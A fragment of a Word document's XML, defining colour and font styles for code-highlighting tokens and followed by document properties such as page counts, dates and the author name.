    <w:basedOn w:val="36"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="902000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="42">
    <w:name w:val="DecValTok"/>
    <w:basedOn w:val="36"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="40A070"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="43">
    <w:name w:val="BaseNTok"/>
    <w:basedOn w:val="36"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="40A070"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="44">
    <w:name w:val="FloatTok"/>
    <w:basedOn w:val="36"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="40A070"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="45">
    <w:name w:val="ConstantTok"/>
    <w:basedOn w:val="36"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="880000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="46">
    <w:name w:val="CharTok"/>
    <w:basedOn w:val="36"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="4070A0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="47">
    <w:name w:val="SpecialCharTok"/>
    <w:basedOn w:val="36"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="4070A0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="48">
    <w:name w:val="StringTok"/>
    <w:basedOn w:val="36"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="4070A0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="49">
    <w:name w:val="VerbatimStringTok"/>
    <w:basedOn w:val="36"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="4070A0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="50">
    <w:name w:val="SpecialStringTok"/>
    <w:basedOn w:val="36"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="BB6688"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="51">
    <w:name w:val="ImportTok"/>
    <w:basedOn w:val="36"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:color w:val="008000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="52">
    <w:name w:val="CommentTok"/>
    <w:basedOn w:val="36"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:i/>
      <w:color w:val="60A0B0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="53">
    <w:name w:val="DocumentationTok"/>
    <w:basedOn w:val="36"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:i/>
      <w:color w:val="BA2121"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="54">
    <w:name w:val="AnnotationTok"/>
    <w:basedOn w:val="36"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:i/>
      <w:color w:val="60A0B0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="55">
    <w:name w:val="CommentVarTok"/>
    <w:basedOn w:val="36"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:i/>
      <w:color w:val="60A0B0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="56">
    <w:name w:val="OtherTok"/>
    <w:basedOn w:val="36"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="007020"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="57">
    <w:name w:val="FunctionTok"/>
    <w:basedOn w:val="36"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="06287E"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="58">
    <w:name w:val="VariableTok"/>
    <w:basedOn w:val="36"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="19177C"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="59">
    <w:name w:val="ControlFlowTok"/>
    <w:basedOn w:val="36"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:color w:val="007020"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="60">
    <w:name w:val="OperatorTok"/>
    <w:basedOn w:val="36"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="666666"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="61">
    <w:name w:val="BuiltInTok"/>
    <w:basedOn w:val="36"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="008000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="62">
    <w:name w:val="ExtensionTok"/>
    <w:basedOn w:val="36"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="63">
    <w:name w:val="PreprocessorTok"/>
    <w:basedOn w:val="36"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="BC7A00"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="64">
    <w:name w:val="AttributeTok"/>
    <w:basedOn w:val="36"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="7D9029"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="65">
    <w:name w:val="RegionMarkerTok"/>
    <w:basedOn w:val="36"/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="66">
    <w:name w:val="InformationTok"/>
    <w:basedOn w:val="36"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:i/>
      <w:color w:val="60A0B0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="67">
    <w:name w:val="WarningTok"/>
    <w:basedOn w:val="36"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:i/>
      <w:color w:val="60A0B0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="68">
    <w:name w:val="AlertTok"/>
    <w:basedOn w:val="36"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:color w:val="FF0000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="69">
    <w:name w:val="ErrorTok"/>
    <w:basedOn w:val="36"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:color w:val="FF0000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="70">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28</Pages>
  <Words>5114</Words>
  <Characters>10839</Characters>
  <Lines>12</Lines>
  <Paragraphs>8</Paragraphs>
  <TotalTime>88</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>11348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2023-03-18T07:20:00Z</dcterms:created>
  <dc:creator>踏雪折梅</dc:creator>
  <cp:lastModifiedBy>踏雪折梅</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-10T01:40:47Z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82ACD5ADB522483C85436815F653C438</vt:lpwstr>
  </property>
</Properties>
</file>